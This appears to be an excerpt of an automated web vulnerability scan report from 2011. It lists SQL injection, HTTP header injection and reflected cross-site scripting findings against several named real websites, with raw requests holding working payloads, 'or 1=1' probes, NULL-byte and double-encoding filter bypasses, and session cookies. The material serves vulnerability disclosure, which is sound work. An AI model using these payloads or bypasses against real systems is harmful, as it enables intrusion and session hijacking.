SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /cat/48/1/40836/Netsparker3fca331e008f470991bca348524bafeb.aspx' HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI
Accept-Encoding: gzip, deflate
The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL ...[SNIP]... </textarea> Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15
Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima ...[SNIP]...
1.3. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.caribbean-ocean.com
Path: /get-image.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'2652' at line 1<br /><br /><textarea rows="10" cols="100" ...[SNIP]... </textarea> Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15
Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima ...[SNIP]...
The action parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the action parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:45:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-language: en
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> ...[SNIP]... FROM category cat, sub_category subcat WHERE cat.category_id = subcat.category_id AND LOWER(subcat.sub_category_name) = 'index.php?title=-&action=raw'&gen=js&useskin=monobook' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 5
The title parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the title parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:44:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-language: en
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20184
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> ...[SNIP]... WHERE cat.category_id = subcat.category_id AND LOWER(subcat.sub_category_name) = 'index.php?title=mediawiki:monobook.css%00'&usemsgcache=yes&action=raw&ctype=text/css&smaxage=18000' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 5
The CategoryID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CategoryID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /careers.php?CategoryID=23' HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/careers.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELEC ...[SNIP]...
The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. The payloads 14542449'%20or%201%3d1--%20 and 14542449'%20or%201%3d2--%20 were each submitted in the ASP.NET_SessionId cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The CurrentROLSession cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CurrentROLSession cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /Register/WebResource.axd HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=%2527; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;
Response 1 (redirected)
HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Apr 2011 19:40:19 GMT
Connection: close
X-Powered-By: ASP.NET
Content-Length: 19098
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title>
GET /Register/WebResource.axd HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=%2527%2527; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://regonline.activeeurope.com/__404.aspx">here</a>.</h2> </body></html>
2. HTTP header injection
There are 3 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
2.1. http://www.regonline.com/marketing/event/features/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.regonline.com
Path: /marketing/event/features/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload da698%00%0d%0a3fd008c10bf was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
The application attempts to block header injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the newline characters.
Request
GET /marketing/event/features/?da698%00%0d%0a3fd008c10bf=1 HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;
Response
HTTP/1.1 301 moved permanently
Content-Type: text/html
Date: Tue, 19 Apr 2011 19:40:40 GMT
Location: http://www.regonline.com/__features/?da698
3fd008c10bf=1:
Connection: close
Content-Length: 0
2.2. http://www.regonline.com/marketing/event/pricing/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.regonline.com
Path: /marketing/event/pricing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload a2d40%00%0d%0ab15c88885b1 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
The application attempts to block header injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the newline characters.
Request
GET /marketing/event/pricing/?a2d40%00%0d%0ab15c88885b1=1 HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;
Response
HTTP/1.1 301 moved permanently
Content-Type: text/html
Date: Tue, 19 Apr 2011 19:40:35 GMT
Location: http://www.regonline.com/__pricing/?a2d40
b15c88885b1=1:
Connection: close
Content-Length: 0
2.3. http://www.regonline.com/marketing/event/testimonials/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.regonline.com
Path: /marketing/event/testimonials/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 8fca8%0d%0acb9e5a58209 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /marketing/event/testimonials/?8fca8%0d%0acb9e5a58209=1 HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;
Response
HTTP/1.1 301 moved permanently
Content-Type: text/html
Date: Tue, 19 Apr 2011 19:40:35 GMT
Location: http://www.regonline.com/__resources/?8fca8
cb9e5a58209=1:
Connection: close
Content-Length: 0
3. Cross-site scripting (reflected)
There are 195 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 77cef<script>alert(1)</script>e7b87124b3c was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=777cef<script>alert(1)</script>e7b87124b3c&c2=7400849&c3=1&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blog.viglink.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload f29b7<script>alert(1)</script>6928a4854ea was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6036034&c3=&c4=/clips15540%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Ef37e55f8e40/360434/god-bless-you-captain-hindsight&c5=20000&c6=&c15=f29b7<script>alert(1)</script>6928a4854ea HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/clips15540%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef37e55f8e40/360434/god-bless-you-captain-hindsight
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload b1411<script>alert(1)</script>c556e7c19dc was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=7400849b1411<script>alert(1)</script>c556e7c19dc&c3=1&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blog.viglink.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload d261f<script>alert(1)</script>90e70e35545 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=7400849&c3=1d261f<script>alert(1)</script>90e70e35545&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blog.viglink.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 78b30<script>alert(1)</script>5454f96e47f was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=7400849&c3=1&c4=78b30<script>alert(1)</script>5454f96e47f&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blog.viglink.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 65838<script>alert(1)</script>7988e0f5ce8 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=7400849&c3=1&c4=&c5=65838<script>alert(1)</script>7988e0f5ce8&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blog.viglink.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 4118b<script>alert(1)</script>4ac7260861d was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=7400849&c3=1&c4=&c5=&c6=4118b<script>alert(1)</script>4ac7260861d HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blog.viglink.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2aed"><script>alert(1)</script>ea1579b376b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3a2aed"><script>alert(1)</script>ea1579b376b/Dominos/11Q2/CPC/728/11060627171@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 344
Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ae76"><script>alert(1)</script>e6d8e4920b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos8ae76"><script>alert(1)</script>e6d8e4920b2/11Q2/CPC/728/11060627171@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa50c"><script>alert(1)</script>f435d50f889 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2fa50c"><script>alert(1)</script>f435d50f889/CPC/728/11060627171@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63980"><script>alert(1)</script>f41eb06de7c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC63980"><script>alert(1)</script>f41eb06de7c/728/11060627171@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:05:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 344
Content-Type: text/html
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c367"><script>alert(1)</script>9f4a0217226 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC/7285c367"><script>alert(1)</script>9f4a0217226/11060627171@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:05:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db4ff"><script>alert(1)</script>9cb16008c26 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC/728/11060627171@x90db4ff"><script>alert(1)</script>9cb16008c26 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:05:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3091d"><script>alert(1)</script>6f772d0085e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B33091d"><script>alert(1)</script>6f772d0085e/Dominos/11Q2/CPC/728/11959749775@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
